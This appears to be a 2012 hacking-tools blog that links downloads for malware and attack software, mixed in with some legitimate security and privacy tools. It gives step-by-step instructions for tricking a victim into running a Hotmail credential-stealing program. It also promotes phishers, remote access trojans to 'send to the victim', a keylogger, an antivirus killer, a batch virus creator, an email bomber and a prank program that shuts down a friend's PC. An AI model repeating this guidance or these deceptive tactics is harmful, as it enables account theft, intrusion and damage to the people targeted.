Friday, 19 October 2012
Thursday, 18 October 2012
fake msn freezer : msn hacker
This program do not freeze MSN accounts but you can use it to play pranks on your friends. You can send it to your friend telling him that it freezes people's MSN accounts. When he/she will double-click it, it will shutdown their PC within 30 seconds. You can also bind some keylogger or RAT to it with a binder and crypt it with a crypter if you really want to hack them. Enjoy!
Download
Or
Here
Labels:
Msn Hacaking,
Softwares
Im Spammer :Msn Hacker
This software can spam the MSN with the characters you type. Type the message in the box to spam and click Spam and see the live ruin showing. It will send unlimited messages until you hit Stop. When I tested this on my computer, it caused my PC to hang and ultimately, I had to restart my system. Enjoy !
Download
Or
Here
Labels:
Msn Hacaking,
Softwares
Tuesday, 9 October 2012
HACK HOTMAIL ACCOUNTS: Msn Hacker
I had posted already Gmail Hacker to hack Gmail accounts.With this software we can hack hotmail accounts.
- Run Hotmail Hacker Builder.exe file on ur pc.
- Enter your email address password and subject of email you want to receive
- Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
- Now, send this Hotmail Hacker.exe file to victim of which you want to hack Hotmail password and convince him that this program can hack anyone's Hotmail passwords.
- Say him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he want to hack. As he enters this information and hits Login and Start he will receive a error message.
- You will receive an email in your account containing his password. Hurrah! you will now be able to hack hotmail password.
Or
Herer
Labels:
Msn Hacaking,
Softwares
Saturday, 6 October 2012
KILL TASKS ON VICTIM COMPUTER : AV KILLER
avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.
Download
Or
Here
SWISS ARMY KNIFE
Swiss Army Knife is software and program which hav ability to perform tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.
Download
Or
Here
SMAC : THE MAC ADDRESS CHANGER
SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.
- Automatically Activate MAC Address after changing
- display the manufacturer of the MAC Address
- Generate any New MAC Address based on a selected manufacturer
- Preload MAC Addresses List n choose the new MAC address from the list.
- IPConfig button click to display network adapter info to confirm changes
- Userfriendly GUI
INVISIBLE SECRETS
- Delete carrier file after process
- Add fake files to play pranks on friends
- Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images
Or
Here
Tuesday, 2 October 2012
WIRESHARK: SNIFFER
Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.
Download
TCP DUMP: SNIFFER
Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.
Download
HACKING GMAIL ACCOUNTS :PHISING
Gmail phisher is a phisher for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.
Download
Or
Here
Labels:
Gmail Hacking,
Softwares
HACKING ORKUT ACCOUNTS :PHISING
Orkut Phisher is a phisher for hacking Orkut accounts like Gmail Phising. Just send it to anyone and say him to enter login details. Once he enters his login details, a text file containing passwords of the user is generated automatically.
Download
Or
Here
Labels:
Phising Tools,
Softwares
HACK COMPUTERS REMOTELY : PRORAT
PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect victim's PC in different ways. Just create the server and send it to the victim.
Download
REVENGER REMOTE VICTIM PC
Revenger is a simple advanced remote administration tool RAT which is used to access and control pcs remotely . It uses clientserver method for remote control and administration of pcs.create the server n send to victim and you can track and control every activity of the remote users.
Download
Or
Here
HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4
Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling the victim computer in many ways.
Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected.
Download
Or
Here
SONIC BAT - THE BATCH FILE VIRUS CREATOR
This program creates batch .bat viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.
Download
Or
Here
Labels:
Softwares,
Virus Creator
Sunday, 30 September 2012
SANDBOXIE
Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.
The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk no sandbox shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.
Download Here
Labels:
Softwares,
virus protection
DEEP FREEZE: PROTECT YOUR COMPUTER
Like Sandboxie Deep Freeze helps eliminate computer damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer — regardless of whether they are accidental or malicious — are never permanent. Deep Freeze provides immediate immunity from many of the problems that plague computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation. Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.
Download Here
Labels:
Softwares,
virus protection
VULNERABILITY ASSESSMENT TOOL : RETINA
Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.
Download here
Labels:
Softwares,
Web Hacking
THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT
The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.
Download Here
Labels:
Softwares,
Web Hacking
VULNERABILITY ASSESSMENT TOOL : NESSUS
Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.
Download Here
Labels:
Softwares,
Web Hacking
KISMET
Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.
Download Here
Download Here
Labels:
Softwares,
Wireless Hacks
AIRCRACK
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
Download Here
Labels:
Softwares,
Wireless Hacks
AIRSNORT
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and WPA passwords, AirSnort has a limitation to cracking only WEP passwords.
Download Here
Labels:
Softwares,
Wireless Hacks
GHOSTSURF PLATINUM
The ultimate IP address hider and anonymizer which include the following features:
Encrypts your Internet connection
Erases all traces of your Web surfing
Removes aggressive spyware
Prevents identity theft and credit card fraud
Secures confidential files
Eliminates online ads
Also includes Spycatcher which is an excellent anti-spyware.
Download here
Encrypts your Internet connection
Erases all traces of your Web surfing
Removes aggressive spyware
Prevents identity theft and credit card fraud
Secures confidential files
Eliminates online ads
Also includes Spycatcher which is an excellent anti-spyware.
Download here
IP ANONYMIZER
IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.
Download:
HOTSPOT SHIELD
Hotspot Shield protects your entire web
surfing session; securing your connection at both your home Internet
network & Public Internet networks (both wired and wireless).
Hotspot Shield protects your identity by ensuring that all web
transactions (shopping, filling out forms, downloads) are secured
through HTTPS. Hotspot Shield also makes you private online making your
identity invisible to third party websites and ISP’s. Unless you choose
to sign into a certain site, you will be anonymous for your entire web
session with Hotspot Shield. Hotspot Shield creates a virtual private
network (VPN) between your laptop or iPhone and our Internet gateway.
This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing
your web browsing activities, instant messages, downloads, credit card
information or anything else you send over the network. Hotspot Shield
security application employs the latest VPN technology, and is easy to
install and use.
Download here:
Download here:
ANONYMOUS SURFING : TOR
Tor
is a very good and free anonymizer program which hides our IP address
and protects our privacy. Tor prevents websites from tracking us. Tor
provides the foundation for a range of applications that allow
organizations and individuals to share information over public networks
without compromising their privacy. It is also available as an firefox
addon.
PASSLIST GENERATOR FOR BRUTE
This program generates random password lists for bruteforcing. It generates the passwords at a lightning speed. But as you know, longer the password, little more time it will take. It has a simple interface which asks two simple questions. You just have to answer them and this program will generate the password list in password.txt file in the same directory so that you can use it in a program like Bruteforcer, Brutus etc for bruteforce attack.
Download Here
Or
Here
Labels:
Cracking
WINDOWS PASSWORD RECOVERY TOOL
SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:
- Brute-force attack
- Distributed attack
- Mask attack
- Dictionary attack
- Hybrid attack
- Pre-calculated tables attack
Download Here
Or
Here
Labels:
Cracking
Saturday, 29 September 2012
Havij Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users
Download Here
Or
Here
Labels:
Web Hacking
Friday, 28 September 2012
RapidShare Account Generator, Generate Unlimited Accounts
RapidShare is a website designed to host digital files so other people can download them to their computers. The website calls itself the "Anti-Waiting Company," and when you sign up for their premium service you can get immediate access to downloads. If you don't want to pay for a RapidShare premium account, however, you can still use RapidShare to download files, it just takes a bit longer.
Download
Or
Here
Labels:
Softwares
Email address harvesting
The simplest method involves spammers purchasing or trading lists of email addresses from other spammers.
Another common method is the use of special software known as "harvesting bots" or "harvesters", which spider Web pages, postings on Usenet, mailing list archives, internet forums and other online sources to obtain email addresses from public data.
Spammers may also use a form of dictionary attack in order to harvest email addresses, known as a directory harvest attack, where valid email addresses at a specific domain are found by guessing email address using common usernames in email addresses at that domain. For example, trying alan@example.com, alana@example.com, alanb@example.com, etc. and any that are accepted for delivery by the recipient email server, instead of rejected, are added to the list of theoretically valid email addresses for that domain.
Download
Labels:
Softwares
Light Email Bomber
Mass mailing consists of sending numerous duplicate mails to the same email address. These types of mail bombs are simple to design but their extreme simplicity means they can be easily detected by spam filters. Email-bombing using mass mailing is also commonly performed as a DDoS attack by employing the use of "zombie" hierarchical networks of computers compromised by malware and under the attacker's control.
Download
or
Here
Labels:
Gmail Hacking,
Softwares
Thursday, 27 September 2012
Facebook like Bot Increase your facbook likes
you can Download Here
Or
Here
Labels:
facebook
Wednesday, 26 September 2012
How To Hack a Remote Computer Using Ardamax Keylogger
Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.
Here is tutorial for setup
Tutorial
For Download
Download Here
or
Here
Labels:
keyloggers
Magic PS v1.5 SE FINAL- Hack Password Yahoo ID or Messenger
Magic PS v1.5 SE FINAL is a free tool to hack any Yahoo mail ID or Yahoo Messenger password. You can use it to get password for any yahoo or messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo!.
or
Labels:
Yahoo Hacking
Tuesday, 25 September 2012
CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords
CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not.
Download
Subscribe to:
Posts (Atom)